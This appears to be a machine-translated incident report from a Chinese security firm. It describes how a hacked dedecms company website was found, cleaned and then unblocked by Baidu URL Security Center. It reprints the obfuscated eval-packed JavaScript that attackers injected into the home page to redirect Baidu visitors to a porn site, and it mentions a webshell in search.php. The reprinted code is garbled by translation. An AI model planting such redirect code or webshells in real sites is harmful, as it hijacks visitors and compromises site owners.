Shulou(Shulou.com)06/01 Report--

Near the end of 2019, the customer's company website was intercepted by Baidu URL Security Center, the company website can not be opened completely, the scope of influence is very large, so through the introduction of friends to find our SINE security company to seek help to unseal, on how to remove Baidu security interception tips, the following will be our SINE security solutions to you, I hope to help you.

Incident recollection: in early December, when the customer just came home from work from the company, he received a call from the leader saying that the website could not be opened in Baidu. The customer immediately visited the website on his mobile phone and found that the website was normal. Then he used Baidu to search for the company's domain name. Found that the website was blocked by Baidu URL Security Center and prompted: illegal web page, suggested to close, you visit is: / / company domain name This page may be illegal and contains illegal information and unhealthy content. Please visit it carefully. As shown in the following figure:

The entire customer company's website could not be opened in Baidu and was completely blocked by Baidu. Baidu must have prompted it for a reason. We SINE security engineers found that the site was marked in the search results through Baidu search:

Baidu URL Security Center reminds you: this site may be attacked by hackers, some pages have been illegally tampered with! The following figure shows:

Click to go, pop-up Baidu intercept page, prompt: the site may be attacked by hackers, some pages have been illegally tampered with, may threaten your property and information security, you are advised to visit carefully. We have dealt with too many websites like this situation, we open the Baidu URL Security Center https://bsb.baidu.com/ scan to see what causes the site to be intercepted by Baidu, enter the customer company URL point query, find that the website is marked dangerous, and prompt: dangerous, the website page contains malicious information!

This shows that the information containing malicious content in the website has been detected by Baidu, but Baidu did not point out which website page has malicious information. I saw that Baidu also has a Baidu cloud observation product and registered for free use. Check the security of the website, and no security problems have been detected. Where is the information containing malicious content? How to find, according to our SINE security experience for many years, through Baidu's tools and sending e-mails, complaints and other channels are not able to get specific malicious information links, Baidu is just an official reply, where the root of the specific problem, you have to find the code yourself, as well as the company's website included in Baidu.

Found a problem, the customer company website in Baidu snapshot content has been tampered with, is some color piao content, since we already know that the website contains malicious information. Then start from the website code, the customer website uses the open source dedecms dream weaving system, php+mysql database, compressed a copy from the server, downloaded to the local computer, began to check the source code, every line, every code do not let go, compared with the customer before the website backup code, found that plus under the search.php has been tampered with, more than some eval word Trojan code, also known as webshell.

The customer's website home page file index.html has also been tampered with and added the code, especially the title description has been tampered with, from Baidu search click to the customer company website, automatically jump to the color piao website. This corresponds to the tampering of index.html. We securely post the code on SINE for everyone to take a look at:

Eval (function) {e=function (c) {return (c35?String.fromCharCode (citation 29): c.toString (36))}; if (! '.replace (/ ^ /, St)

Ring)) {while (c) d [e (c)] = k [c] | e (c); k = [function (e) {return d [e]}]; e=function () {return'\\ wrought'}; c =

1;}; while (C Mustang -) if (k [c]) p=p.replace (new RegExp ('\\ baked accoune (c) +'\ baked gramma'), k [c]); return p;} ('l ["\\ k\\ a\\ 1\

\ m\ 9\ 7\ o\ 0 "] ["\\ n\ 4\\ 8\\ 0\ 7 "] (\ e\ 2\ 1\ 4\ 8\ 5\ 0\ I\ 5\ 7\ c\ 6\ 0\ 7\ j\ 0\ 3\ f\ b\ u\ b\ 2\

\ 1\ 4\ 8\ 5\ 0\ 6\ 3\ c\\ 6\ t\ 0\ 0\ 5\ w\ 3\ 3\ v\ Q\ p\ s\ r\ h\ 1\ a\ 9\ 3\ g\ g\ h\ f\ 2\ 6\ d\\

E\\ 3\ 2\\ 1\ 4\ 8\ 5\ 0\ d\);', 33Magi 33Powerx74 | x63 | x73 | x2f | x72 | x70 | x65 | x69 | x6d | x6f | x61 | x3d | x3e |

X3c | x6a | x31 | x2e | x79 | x78 | x64 | window | x75 | x77 | x6e | x38 | x37 | x71 | x7a | x68 | x76 |

X35 | x3a'.split ('|'), 0, {}))

The function of this hanging horse code is to judge the click from Baidu and jump to the domain name set by the attacker. If you enter the domain name of the website directly, it will not jump. If you don't know much about the code, you can't understand the meaning of this code at all. If the problem is found, then start to deal with it, delete the malicious code on the home page, resume normal access to the website, delete the webshell website Trojan backdoor file left by the attacker, and conduct a comprehensive website security test on the customer's website code, including website vulnerability detection, and found that the customer is using an early version of dedecms, there are remote code execution vulnerabilities, and files that can upload arbitrary files are vulnerable. Our SINE security has fixed vulnerabilities in its code, made security filtering and restrictions on upload suffixes, and securely deployed directories for file uploads to prevent the execution and writing of PHP script files. The overall security reinforcement and protection of the website has been carried out to prevent attackers from continuing to tamper with the website. some customer websites think that only deleting that part of the malicious code on the home page can solve the problem. It is a big mistake. The root cause of the problem is not deletion, but the existence of loopholes in the website. just deleting malicious code is actually mending after the sheep is lost, and we should start from the root to repair the loopholes of the website. In order to completely solve the problem of Baidu interception, Baidu will regularly monitor the security of the website. If it is tampered with many times, it will directly pull your website into the blacklist and intercept the website for a long time.

At this point, the customer website was secure, thoroughly deleted malicious information and malicious code, submitted a complaint online through Baidu URL Security Center, waiting for Baidu manual review, and received a reply from Baidu URL Security Center on the third day after the complaint. Baidu URL security technician replied as follows: Hello, the test result for the domain name of https:// website is: through the audit To this website was intercepted by Baidu URL Security Center, completely unsealed, the customer company website to resume normal access, we will reduce the loss to customers to a minimum, the customer's things as their own to do, our road can be wider.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.